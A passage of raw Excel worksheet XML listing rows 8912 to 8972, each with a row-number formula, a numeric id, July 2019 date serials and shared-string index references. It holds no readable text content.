    <row r="8912" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8912">
        <f t="shared" si="139"/>
        <v>8911</v>
      </c>
      <c r="B8912">
        <v>3911</v>
      </c>
      <c r="C8912" t="s">
        <v>9973</v>
      </c>
      <c r="D8912" s="1">
        <v>43668</v>
      </c>
      <c r="E8912" t="s">
        <v>17500</v>
      </c>
      <c r="F8912" t="s">
        <v>9975</v>
      </c>
      <c r="G8912" t="s">
        <v>17501</v>
      </c>
    </row>
    <row r="8913" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8913">
        <f t="shared" si="139"/>
        <v>8912</v>
      </c>
      <c r="B8913">
        <v>3912</v>
      </c>
      <c r="C8913" t="s">
        <v>9973</v>
      </c>
      <c r="D8913" s="1">
        <v>43672</v>
      </c>
      <c r="E8913" t="s">
        <v>17502</v>
      </c>
      <c r="F8913" t="s">
        <v>9975</v>
      </c>
      <c r="G8913" t="s">
        <v>17503</v>
      </c>
    </row>
    <row r="8914" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8914">
        <f t="shared" si="139"/>
        <v>8913</v>
      </c>
      <c r="B8914">
        <v>3913</v>
      </c>
      <c r="C8914" t="s">
        <v>9973</v>
      </c>
      <c r="D8914" s="1">
        <v>43670</v>
      </c>
      <c r="E8914" t="s">
        <v>17504</v>
      </c>
      <c r="F8914" t="s">
        <v>9975</v>
      </c>
      <c r="G8914" t="s">
        <v>17505</v>
      </c>
    </row>
    <row r="8915" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8915">
        <f t="shared" si="139"/>
        <v>8914</v>
      </c>
      <c r="B8915">
        <v>3914</v>
      </c>
      <c r="C8915" t="s">
        <v>9973</v>
      </c>
      <c r="D8915" s="1">
        <v>43672</v>
      </c>
      <c r="E8915" t="s">
        <v>17506</v>
      </c>
      <c r="F8915" t="s">
        <v>9975</v>
      </c>
      <c r="G8915" t="s">
        <v>17507</v>
      </c>
    </row>
    <row r="8916" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8916">
        <f t="shared" si="139"/>
        <v>8915</v>
      </c>
      <c r="B8916">
        <v>3915</v>
      </c>
      <c r="C8916" t="s">
        <v>9973</v>
      </c>
      <c r="D8916" s="1">
        <v>43672</v>
      </c>
      <c r="E8916" t="s">
        <v>17508</v>
      </c>
      <c r="F8916" t="s">
        <v>9975</v>
      </c>
      <c r="G8916" t="s">
        <v>17509</v>
      </c>
    </row>
    <row r="8917" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8917">
        <f t="shared" si="139"/>
        <v>8916</v>
      </c>
      <c r="B8917">
        <v>3916</v>
      </c>
      <c r="C8917" t="s">
        <v>9973</v>
      </c>
      <c r="D8917" s="1">
        <v>43670</v>
      </c>
      <c r="E8917" t="s">
        <v>17510</v>
      </c>
      <c r="F8917" t="s">
        <v>9975</v>
      </c>
      <c r="G8917" t="s">
        <v>17511</v>
      </c>
    </row>
    <row r="8918" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8918">
        <f t="shared" si="139"/>
        <v>8917</v>
      </c>
      <c r="B8918">
        <v>3917</v>
      </c>
      <c r="C8918" t="s">
        <v>9973</v>
      </c>
      <c r="D8918" s="1">
        <v>43677</v>
      </c>
      <c r="E8918" t="s">
        <v>17512</v>
      </c>
      <c r="F8918" t="s">
        <v>9975</v>
      </c>
      <c r="G8918" t="s">
        <v>17513</v>
      </c>
    </row>
    <row r="8919" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8919">
        <f t="shared" si="139"/>
        <v>8918</v>
      </c>
      <c r="B8919">
        <v>3918</v>
      </c>
      <c r="C8919" t="s">
        <v>9973</v>
      </c>
      <c r="D8919" s="1">
        <v>43677</v>
      </c>
      <c r="E8919" t="s">
        <v>17514</v>
      </c>
      <c r="F8919" t="s">
        <v>9975</v>
      </c>
      <c r="G8919" t="s">
        <v>17515</v>
      </c>
    </row>
    <row r="8920" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8920">
        <f t="shared" si="139"/>
        <v>8919</v>
      </c>
      <c r="B8920">
        <v>3919</v>
      </c>
      <c r="C8920" t="s">
        <v>9973</v>
      </c>
      <c r="D8920" s="1">
        <v>43672</v>
      </c>
      <c r="E8920" t="s">
        <v>17516</v>
      </c>
      <c r="F8920" t="s">
        <v>9975</v>
      </c>
      <c r="G8920" t="s">
        <v>17517</v>
      </c>
    </row>
    <row r="8921" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8921">
        <f t="shared" si="139"/>
        <v>8920</v>
      </c>
      <c r="B8921">
        <v>3920</v>
      </c>
      <c r="C8921" t="s">
        <v>9973</v>
      </c>
      <c r="D8921" s="1">
        <v>43677</v>
      </c>
      <c r="E8921" t="s">
        <v>17518</v>
      </c>
      <c r="F8921" t="s">
        <v>9975</v>
      </c>
      <c r="G8921" t="s">
        <v>17519</v>
      </c>
    </row>
    <row r="8922" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8922">
        <f t="shared" si="139"/>
        <v>8921</v>
      </c>
      <c r="B8922">
        <v>3921</v>
      </c>
      <c r="C8922" t="s">
        <v>9973</v>
      </c>
      <c r="D8922" s="1">
        <v>43675</v>
      </c>
      <c r="E8922" t="s">
        <v>17520</v>
      </c>
      <c r="F8922" t="s">
        <v>9975</v>
      </c>
      <c r="G8922" t="s">
        <v>17521</v>
      </c>
    </row>
    <row r="8923" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8923">
        <f t="shared" si="139"/>
        <v>8922</v>
      </c>
      <c r="B8923">
        <v>3922</v>
      </c>
      <c r="C8923" t="s">
        <v>9973</v>
      </c>
      <c r="D8923" s="1">
        <v>43671</v>
      </c>
      <c r="E8923" t="s">
        <v>17522</v>
      </c>
      <c r="F8923" t="s">
        <v>9975</v>
      </c>
      <c r="G8923" t="s">
        <v>17523</v>
      </c>
    </row>
    <row r="8924" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8924">
        <f t="shared" si="139"/>
        <v>8923</v>
      </c>
      <c r="B8924">
        <v>3923</v>
      </c>
      <c r="C8924" t="s">
        <v>9973</v>
      </c>
      <c r="D8924" s="1">
        <v>43668</v>
      </c>
      <c r="E8924" t="s">
        <v>17524</v>
      </c>
      <c r="F8924" t="s">
        <v>9975</v>
      </c>
      <c r="G8924" t="s">
        <v>17525</v>
      </c>
    </row>
    <row r="8925" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8925">
        <f t="shared" si="139"/>
        <v>8924</v>
      </c>
      <c r="B8925">
        <v>3924</v>
      </c>
      <c r="C8925" t="s">
        <v>9973</v>
      </c>
      <c r="D8925" s="1">
        <v>43672</v>
      </c>
      <c r="E8925" t="s">
        <v>17526</v>
      </c>
      <c r="F8925" t="s">
        <v>9975</v>
      </c>
      <c r="G8925" t="s">
        <v>17527</v>
      </c>
    </row>
    <row r="8926" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8926">
        <f t="shared" si="139"/>
        <v>8925</v>
      </c>
      <c r="B8926">
        <v>3925</v>
      </c>
      <c r="C8926" t="s">
        <v>9973</v>
      </c>
      <c r="D8926" s="1">
        <v>43674</v>
      </c>
      <c r="E8926" t="s">
        <v>17528</v>
      </c>
      <c r="F8926" t="s">
        <v>9975</v>
      </c>
      <c r="G8926" t="s">
        <v>17529</v>
      </c>
    </row>
    <row r="8927" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8927">
        <f t="shared" si="139"/>
        <v>8926</v>
      </c>
      <c r="B8927">
        <v>3926</v>
      </c>
      <c r="C8927" t="s">
        <v>9973</v>
      </c>
      <c r="D8927" s="1">
        <v>43673</v>
      </c>
      <c r="E8927" t="s">
        <v>17530</v>
      </c>
      <c r="F8927" t="s">
        <v>9975</v>
      </c>
      <c r="G8927" t="s">
        <v>17531</v>
      </c>
    </row>
    <row r="8928" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8928">
        <f t="shared" si="139"/>
        <v>8927</v>
      </c>
      <c r="B8928">
        <v>3927</v>
      </c>
      <c r="C8928" t="s">
        <v>9973</v>
      </c>
      <c r="D8928" s="1">
        <v>43672</v>
      </c>
      <c r="E8928" t="s">
        <v>17532</v>
      </c>
      <c r="F8928" t="s">
        <v>9975</v>
      </c>
      <c r="G8928" t="s">
        <v>17533</v>
      </c>
    </row>
    <row r="8929" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8929">
        <f t="shared" si="139"/>
        <v>8928</v>
      </c>
      <c r="B8929">
        <v>3928</v>
      </c>
      <c r="C8929" t="s">
        <v>9973</v>
      </c>
      <c r="D8929" s="1">
        <v>43670</v>
      </c>
      <c r="E8929" t="s">
        <v>17534</v>
      </c>
      <c r="F8929" t="s">
        <v>9975</v>
      </c>
      <c r="G8929" t="s">
        <v>17535</v>
      </c>
    </row>
    <row r="8930" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8930">
        <f t="shared" si="139"/>
        <v>8929</v>
      </c>
      <c r="B8930">
        <v>3929</v>
      </c>
      <c r="C8930" t="s">
        <v>9973</v>
      </c>
      <c r="D8930" s="1">
        <v>43671</v>
      </c>
      <c r="E8930" t="s">
        <v>17536</v>
      </c>
      <c r="F8930" t="s">
        <v>10021</v>
      </c>
      <c r="G8930" t="s">
        <v>17537</v>
      </c>
    </row>
    <row r="8931" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8931">
        <f t="shared" si="139"/>
        <v>8930</v>
      </c>
      <c r="B8931">
        <v>3930</v>
      </c>
      <c r="C8931" t="s">
        <v>9973</v>
      </c>
      <c r="D8931" s="1">
        <v>43670</v>
      </c>
      <c r="E8931" t="s">
        <v>17538</v>
      </c>
      <c r="F8931" t="s">
        <v>10021</v>
      </c>
      <c r="G8931" t="s">
        <v>17539</v>
      </c>
    </row>
    <row r="8932" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8932">
        <f t="shared" si="139"/>
        <v>8931</v>
      </c>
      <c r="B8932">
        <v>3931</v>
      </c>
      <c r="C8932" t="s">
        <v>9973</v>
      </c>
      <c r="D8932" s="1">
        <v>43671</v>
      </c>
      <c r="E8932" t="s">
        <v>17540</v>
      </c>
      <c r="F8932" t="s">
        <v>9975</v>
      </c>
      <c r="G8932" t="s">
        <v>17541</v>
      </c>
    </row>
    <row r="8933" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8933">
        <f t="shared" si="139"/>
        <v>8932</v>
      </c>
      <c r="B8933">
        <v>3932</v>
      </c>
      <c r="C8933" t="s">
        <v>9973</v>
      </c>
      <c r="D8933" s="1">
        <v>43674</v>
      </c>
      <c r="E8933" t="s">
        <v>17542</v>
      </c>
      <c r="F8933" t="s">
        <v>9975</v>
      </c>
      <c r="G8933" t="s">
        <v>17543</v>
      </c>
    </row>
    <row r="8934" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8934">
        <f t="shared" si="139"/>
        <v>8933</v>
      </c>
      <c r="B8934">
        <v>3933</v>
      </c>
      <c r="C8934" t="s">
        <v>9973</v>
      </c>
      <c r="D8934" s="1">
        <v>43672</v>
      </c>
      <c r="E8934" t="s">
        <v>17544</v>
      </c>
      <c r="F8934" t="s">
        <v>9975</v>
      </c>
      <c r="G8934" t="s">
        <v>17545</v>
      </c>
    </row>
    <row r="8935" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8935">
        <f t="shared" si="139"/>
        <v>8934</v>
      </c>
      <c r="B8935">
        <v>3934</v>
      </c>
      <c r="C8935" t="s">
        <v>9973</v>
      </c>
      <c r="D8935" s="1">
        <v>43672</v>
      </c>
      <c r="E8935" t="s">
        <v>17546</v>
      </c>
      <c r="F8935" t="s">
        <v>9975</v>
      </c>
      <c r="G8935" t="s">
        <v>17547</v>
      </c>
    </row>
    <row r="8936" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8936">
        <f t="shared" si="139"/>
        <v>8935</v>
      </c>
      <c r="B8936">
        <v>3935</v>
      </c>
      <c r="C8936" t="s">
        <v>9973</v>
      </c>
      <c r="D8936" s="1">
        <v>43675</v>
      </c>
      <c r="E8936" t="s">
        <v>17548</v>
      </c>
      <c r="F8936" t="s">
        <v>9975</v>
      </c>
      <c r="G8936" t="s">
        <v>17549</v>
      </c>
    </row>
    <row r="8937" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8937">
        <f t="shared" si="139"/>
        <v>8936</v>
      </c>
      <c r="B8937">
        <v>3936</v>
      </c>
      <c r="C8937" t="s">
        <v>9973</v>
      </c>
      <c r="D8937" s="1">
        <v>43668</v>
      </c>
      <c r="E8937" t="s">
        <v>17550</v>
      </c>
      <c r="F8937" t="s">
        <v>10021</v>
      </c>
      <c r="G8937" t="s">
        <v>17551</v>
      </c>
    </row>
    <row r="8938" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8938">
        <f t="shared" si="139"/>
        <v>8937</v>
      </c>
      <c r="B8938">
        <v>3937</v>
      </c>
      <c r="C8938" t="s">
        <v>9973</v>
      </c>
      <c r="D8938" s="1">
        <v>43675</v>
      </c>
      <c r="E8938" t="s">
        <v>17552</v>
      </c>
      <c r="F8938" t="s">
        <v>9975</v>
      </c>
      <c r="G8938" t="s">
        <v>17553</v>
      </c>
    </row>
    <row r="8939" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8939">
        <f t="shared" si="139"/>
        <v>8938</v>
      </c>
      <c r="B8939">
        <v>3938</v>
      </c>
      <c r="C8939" t="s">
        <v>9973</v>
      </c>
      <c r="D8939" s="1">
        <v>43677</v>
      </c>
      <c r="E8939" t="s">
        <v>17554</v>
      </c>
      <c r="F8939" t="s">
        <v>9975</v>
      </c>
      <c r="G8939" t="s">
        <v>17555</v>
      </c>
    </row>
    <row r="8940" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8940">
        <f t="shared" si="139"/>
        <v>8939</v>
      </c>
      <c r="B8940">
        <v>3939</v>
      </c>
      <c r="C8940" t="s">
        <v>9973</v>
      </c>
      <c r="D8940" s="1">
        <v>43674</v>
      </c>
      <c r="E8940" t="s">
        <v>17556</v>
      </c>
      <c r="F8940" t="s">
        <v>9975</v>
      </c>
      <c r="G8940" t="s">
        <v>17557</v>
      </c>
    </row>
    <row r="8941" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8941">
        <f t="shared" si="139"/>
        <v>8940</v>
      </c>
      <c r="B8941">
        <v>3940</v>
      </c>
      <c r="C8941" t="s">
        <v>9973</v>
      </c>
      <c r="D8941" s="1">
        <v>43676</v>
      </c>
      <c r="E8941" t="s">
        <v>17558</v>
      </c>
      <c r="F8941" t="s">
        <v>9975</v>
      </c>
      <c r="G8941" t="s">
        <v>17559</v>
      </c>
    </row>
    <row r="8942" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8942">
        <f t="shared" si="139"/>
        <v>8941</v>
      </c>
      <c r="B8942">
        <v>3941</v>
      </c>
      <c r="C8942" t="s">
        <v>9973</v>
      </c>
      <c r="D8942" s="1">
        <v>43671</v>
      </c>
      <c r="E8942" t="s">
        <v>17560</v>
      </c>
      <c r="F8942" t="s">
        <v>9975</v>
      </c>
      <c r="G8942" t="s">
        <v>17561</v>
      </c>
    </row>
    <row r="8943" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8943">
        <f t="shared" si="139"/>
        <v>8942</v>
      </c>
      <c r="B8943">
        <v>3942</v>
      </c>
      <c r="C8943" t="s">
        <v>9973</v>
      </c>
      <c r="D8943" s="1">
        <v>43672</v>
      </c>
      <c r="E8943" t="s">
        <v>17562</v>
      </c>
      <c r="F8943" t="s">
        <v>9975</v>
      </c>
      <c r="G8943" t="s">
        <v>17563</v>
      </c>
    </row>
    <row r="8944" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8944">
        <f t="shared" si="139"/>
        <v>8943</v>
      </c>
      <c r="B8944">
        <v>3943</v>
      </c>
      <c r="C8944" t="s">
        <v>9973</v>
      </c>
      <c r="D8944" s="1">
        <v>43670</v>
      </c>
      <c r="E8944" t="s">
        <v>17564</v>
      </c>
      <c r="F8944" t="s">
        <v>9975</v>
      </c>
      <c r="G8944" t="s">
        <v>17565</v>
      </c>
    </row>
    <row r="8945" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8945">
        <f t="shared" si="139"/>
        <v>8944</v>
      </c>
      <c r="B8945">
        <v>3944</v>
      </c>
      <c r="C8945" t="s">
        <v>9973</v>
      </c>
      <c r="D8945" s="1">
        <v>43671</v>
      </c>
      <c r="E8945" t="s">
        <v>17566</v>
      </c>
      <c r="F8945" t="s">
        <v>9975</v>
      </c>
      <c r="G8945" t="s">
        <v>17567</v>
      </c>
    </row>
    <row r="8946" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8946">
        <f t="shared" si="139"/>
        <v>8945</v>
      </c>
      <c r="B8946">
        <v>3945</v>
      </c>
      <c r="C8946" t="s">
        <v>9973</v>
      </c>
      <c r="D8946" s="1">
        <v>43674</v>
      </c>
      <c r="E8946" t="s">
        <v>17568</v>
      </c>
      <c r="F8946" t="s">
        <v>9975</v>
      </c>
      <c r="G8946" t="s">
        <v>17569</v>
      </c>
    </row>
    <row r="8947" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8947">
        <f t="shared" si="139"/>
        <v>8946</v>
      </c>
      <c r="B8947">
        <v>3946</v>
      </c>
      <c r="C8947" t="s">
        <v>9973</v>
      </c>
      <c r="D8947" s="1">
        <v>43669</v>
      </c>
      <c r="E8947" t="s">
        <v>17570</v>
      </c>
      <c r="F8947" t="s">
        <v>9975</v>
      </c>
      <c r="G8947" t="s">
        <v>17571</v>
      </c>
    </row>
    <row r="8948" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8948">
        <f t="shared" si="139"/>
        <v>8947</v>
      </c>
      <c r="B8948">
        <v>3947</v>
      </c>
      <c r="C8948" t="s">
        <v>9973</v>
      </c>
      <c r="D8948" s="1">
        <v>43669</v>
      </c>
      <c r="E8948" t="s">
        <v>17572</v>
      </c>
      <c r="F8948" t="s">
        <v>9975</v>
      </c>
      <c r="G8948" t="s">
        <v>17573</v>
      </c>
    </row>
    <row r="8949" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8949">
        <f t="shared" si="139"/>
        <v>8948</v>
      </c>
      <c r="B8949">
        <v>3948</v>
      </c>
      <c r="C8949" t="s">
        <v>9973</v>
      </c>
      <c r="D8949" s="1">
        <v>43670</v>
      </c>
      <c r="E8949" t="s">
        <v>17574</v>
      </c>
      <c r="F8949" t="s">
        <v>9978</v>
      </c>
      <c r="G8949" t="s">
        <v>17575</v>
      </c>
    </row>
    <row r="8950" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8950">
        <f t="shared" si="139"/>
        <v>8949</v>
      </c>
      <c r="B8950">
        <v>3949</v>
      </c>
      <c r="C8950" t="s">
        <v>9973</v>
      </c>
      <c r="D8950" s="1">
        <v>43675</v>
      </c>
      <c r="E8950" t="s">
        <v>17576</v>
      </c>
      <c r="F8950" t="s">
        <v>9975</v>
      </c>
      <c r="G8950" t="s">
        <v>17577</v>
      </c>
    </row>
    <row r="8951" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8951">
        <f t="shared" si="139"/>
        <v>8950</v>
      </c>
      <c r="B8951">
        <v>3950</v>
      </c>
      <c r="C8951" t="s">
        <v>9973</v>
      </c>
      <c r="D8951" s="1">
        <v>43674</v>
      </c>
      <c r="E8951" t="s">
        <v>17578</v>
      </c>
      <c r="F8951" t="s">
        <v>9975</v>
      </c>
      <c r="G8951" t="s">
        <v>17579</v>
      </c>
    </row>
    <row r="8952" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8952">
        <f t="shared" si="139"/>
        <v>8951</v>
      </c>
      <c r="B8952">
        <v>3951</v>
      </c>
      <c r="C8952" t="s">
        <v>9973</v>
      </c>
      <c r="D8952" s="1">
        <v>43670</v>
      </c>
      <c r="E8952" t="s">
        <v>17580</v>
      </c>
      <c r="F8952" t="s">
        <v>9975</v>
      </c>
      <c r="G8952" t="s">
        <v>17581</v>
      </c>
    </row>
    <row r="8953" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8953">
        <f t="shared" si="139"/>
        <v>8952</v>
      </c>
      <c r="B8953">
        <v>3952</v>
      </c>
      <c r="C8953" t="s">
        <v>9973</v>
      </c>
      <c r="D8953" s="1">
        <v>43675</v>
      </c>
      <c r="E8953" t="s">
        <v>17582</v>
      </c>
      <c r="F8953" t="s">
        <v>9975</v>
      </c>
      <c r="G8953" t="s">
        <v>17583</v>
      </c>
    </row>
    <row r="8954" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8954">
        <f t="shared" si="139"/>
        <v>8953</v>
      </c>
      <c r="B8954">
        <v>3953</v>
      </c>
      <c r="C8954" t="s">
        <v>9973</v>
      </c>
      <c r="D8954" s="1">
        <v>43676</v>
      </c>
      <c r="E8954" t="s">
        <v>17584</v>
      </c>
      <c r="F8954" t="s">
        <v>9975</v>
      </c>
      <c r="G8954" t="s">
        <v>17585</v>
      </c>
    </row>
    <row r="8955" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8955">
        <f t="shared" si="139"/>
        <v>8954</v>
      </c>
      <c r="B8955">
        <v>3954</v>
      </c>
      <c r="C8955" t="s">
        <v>9973</v>
      </c>
      <c r="D8955" s="1">
        <v>43672</v>
      </c>
      <c r="E8955" t="s">
        <v>17586</v>
      </c>
      <c r="F8955" t="s">
        <v>9975</v>
      </c>
      <c r="G8955" t="s">
        <v>17587</v>
      </c>
    </row>
    <row r="8956" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8956">
        <f t="shared" si="139"/>
        <v>8955</v>
      </c>
      <c r="B8956">
        <v>3955</v>
      </c>
      <c r="C8956" t="s">
        <v>9973</v>
      </c>
      <c r="D8956" s="1">
        <v>43669</v>
      </c>
      <c r="E8956" t="s">
        <v>17588</v>
      </c>
      <c r="F8956" t="s">
        <v>9975</v>
      </c>
      <c r="G8956" t="s">
        <v>17589</v>
      </c>
    </row>
    <row r="8957" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8957">
        <f t="shared" si="139"/>
        <v>8956</v>
      </c>
      <c r="B8957">
        <v>3956</v>
      </c>
      <c r="C8957" t="s">
        <v>9973</v>
      </c>
      <c r="D8957" s="1">
        <v>43677</v>
      </c>
      <c r="E8957" t="s">
        <v>17590</v>
      </c>
      <c r="F8957" t="s">
        <v>9975</v>
      </c>
      <c r="G8957" t="s">
        <v>17591</v>
      </c>
    </row>
    <row r="8958" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8958">
        <f t="shared" si="139"/>
        <v>8957</v>
      </c>
      <c r="B8958">
        <v>3957</v>
      </c>
      <c r="C8958" t="s">
        <v>9973</v>
      </c>
      <c r="D8958" s="1">
        <v>43672</v>
      </c>
      <c r="E8958" t="s">
        <v>17592</v>
      </c>
      <c r="F8958" t="s">
        <v>10021</v>
      </c>
      <c r="G8958" t="s">
        <v>17593</v>
      </c>
    </row>
    <row r="8959" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8959">
        <f t="shared" si="139"/>
        <v>8958</v>
      </c>
      <c r="B8959">
        <v>3958</v>
      </c>
      <c r="C8959" t="s">
        <v>9973</v>
      </c>
      <c r="D8959" s="1">
        <v>43669</v>
      </c>
      <c r="E8959" t="s">
        <v>17594</v>
      </c>
      <c r="F8959" t="s">
        <v>9975</v>
      </c>
      <c r="G8959" t="s">
        <v>17595</v>
      </c>
    </row>
    <row r="8960" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8960">
        <f t="shared" si="139"/>
        <v>8959</v>
      </c>
      <c r="B8960">
        <v>3959</v>
      </c>
      <c r="C8960" t="s">
        <v>9973</v>
      </c>
      <c r="D8960" s="1">
        <v>43676</v>
      </c>
      <c r="E8960" t="s">
        <v>17596</v>
      </c>
      <c r="F8960" t="s">
        <v>9975</v>
      </c>
      <c r="G8960" t="s">
        <v>17597</v>
      </c>
    </row>
    <row r="8961" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8961">
        <f t="shared" si="139"/>
        <v>8960</v>
      </c>
      <c r="B8961">
        <v>3960</v>
      </c>
      <c r="C8961" t="s">
        <v>9973</v>
      </c>
      <c r="D8961" s="1">
        <v>43669</v>
      </c>
      <c r="E8961" t="s">
        <v>17598</v>
      </c>
      <c r="F8961" t="s">
        <v>9975</v>
      </c>
      <c r="G8961" t="s">
        <v>17599</v>
      </c>
    </row>
    <row r="8962" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8962">
        <f t="shared" si="139"/>
        <v>8961</v>
      </c>
      <c r="B8962">
        <v>3961</v>
      </c>
      <c r="C8962" t="s">
        <v>9973</v>
      </c>
      <c r="D8962" s="1">
        <v>43676</v>
      </c>
      <c r="E8962" t="s">
        <v>17600</v>
      </c>
      <c r="F8962" t="s">
        <v>9975</v>
      </c>
      <c r="G8962" t="s">
        <v>17601</v>
      </c>
    </row>
    <row r="8963" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8963">
        <f t="shared" ref="A8963:A9026" si="140">+ROW(A8962)</f>
        <v>8962</v>
      </c>
      <c r="B8963">
        <v>3962</v>
      </c>
      <c r="C8963" t="s">
        <v>9973</v>
      </c>
      <c r="D8963" s="1">
        <v>43677</v>
      </c>
      <c r="E8963" t="s">
        <v>17602</v>
      </c>
      <c r="F8963" t="s">
        <v>9975</v>
      </c>
      <c r="G8963" t="s">
        <v>17603</v>
      </c>
    </row>
    <row r="8964" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8964">
        <f t="shared" si="140"/>
        <v>8963</v>
      </c>
      <c r="B8964">
        <v>3963</v>
      </c>
      <c r="C8964" t="s">
        <v>9973</v>
      </c>
      <c r="D8964" s="1">
        <v>43670</v>
      </c>
      <c r="E8964" t="s">
        <v>17604</v>
      </c>
      <c r="F8964" t="s">
        <v>9975</v>
      </c>
      <c r="G8964" t="s">
        <v>17605</v>
      </c>
    </row>
    <row r="8965" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8965">
        <f t="shared" si="140"/>
        <v>8964</v>
      </c>
      <c r="B8965">
        <v>3964</v>
      </c>
      <c r="C8965" t="s">
        <v>9973</v>
      </c>
      <c r="D8965" s="1">
        <v>43671</v>
      </c>
      <c r="E8965" t="s">
        <v>17606</v>
      </c>
      <c r="F8965" t="s">
        <v>10526</v>
      </c>
      <c r="G8965" t="s">
        <v>17607</v>
      </c>
    </row>
    <row r="8966" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8966">
        <f t="shared" si="140"/>
        <v>8965</v>
      </c>
      <c r="B8966">
        <v>3965</v>
      </c>
      <c r="C8966" t="s">
        <v>9973</v>
      </c>
      <c r="D8966" s="1">
        <v>43669</v>
      </c>
      <c r="E8966" t="s">
        <v>17608</v>
      </c>
      <c r="F8966" t="s">
        <v>9975</v>
      </c>
      <c r="G8966" t="s">
        <v>17609</v>
      </c>
    </row>
    <row r="8967" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8967">
        <f t="shared" si="140"/>
        <v>8966</v>
      </c>
      <c r="B8967">
        <v>3966</v>
      </c>
      <c r="C8967" t="s">
        <v>9973</v>
      </c>
      <c r="D8967" s="1">
        <v>43677</v>
      </c>
      <c r="E8967" t="s">
        <v>17610</v>
      </c>
      <c r="F8967" t="s">
        <v>9975</v>
      </c>
      <c r="G8967" t="s">
        <v>17611</v>
      </c>
    </row>
    <row r="8968" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8968">
        <f t="shared" si="140"/>
        <v>8967</v>
      </c>
      <c r="B8968">
        <v>3967</v>
      </c>
      <c r="C8968" t="s">
        <v>9973</v>
      </c>
      <c r="D8968" s="1">
        <v>43675</v>
      </c>
      <c r="E8968" t="s">
        <v>17612</v>
      </c>
      <c r="F8968" t="s">
        <v>9975</v>
      </c>
      <c r="G8968" t="s">
        <v>17613</v>
      </c>
    </row>
    <row r="8969" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8969">
        <f t="shared" si="140"/>
        <v>8968</v>
      </c>
      <c r="B8969">
        <v>3968</v>
      </c>
      <c r="C8969" t="s">
        <v>9973</v>
      </c>
      <c r="D8969" s="1">
        <v>43673</v>
      </c>
      <c r="E8969" t="s">
        <v>17614</v>
      </c>
      <c r="F8969" t="s">
        <v>9975</v>
      </c>
      <c r="G8969" t="s">
        <v>17615</v>
      </c>
    </row>
    <row r="8970" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8970">
        <f t="shared" si="140"/>
        <v>8969</v>
      </c>
      <c r="B8970">
        <v>3969</v>
      </c>
      <c r="C8970" t="s">
        <v>9973</v>
      </c>
      <c r="D8970" s="1">
        <v>43669</v>
      </c>
      <c r="E8970" t="s">
        <v>17616</v>
      </c>
      <c r="F8970" t="s">
        <v>9975</v>
      </c>
      <c r="G8970" t="s">
        <v>17617</v>
      </c>
    </row>
    <row r="8971" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8971">
        <f t="shared" si="140"/>
        <v>8970</v>
      </c>
      <c r="B8971">
        <v>3970</v>
      </c>
      <c r="C8971" t="s">
        <v>9973</v>
      </c>
      <c r="D8971" s="1">
        <v>43669</v>
      </c>
      <c r="E8971" t="s">
        <v>17618</v>
      </c>
      <c r="F8971" t="s">
        <v>9975</v>
      </c>
      <c r="G8971" t="s">
        <v>17619</v>
      </c>
    </row>
    <row r="8972" spans="1:7" x14ac:dyDescent="0.35">
      <c r="A8972">
        <f t="shared" si="140"/>
        <v>8971</v>
      </c>
      <c r="B8972">
        <v>3971</v>
      </c>
      <c r="C8972" t="s">
        <v>9973</v>
      </c>
      <c r="D8972" s="1">
        <v>43675</v>
      </c>
      <c r="E8972" t="s">
        <v>17620</v>
      </c>
      <c r="F8972" t="s">
        <v>9975</v>
      </c>
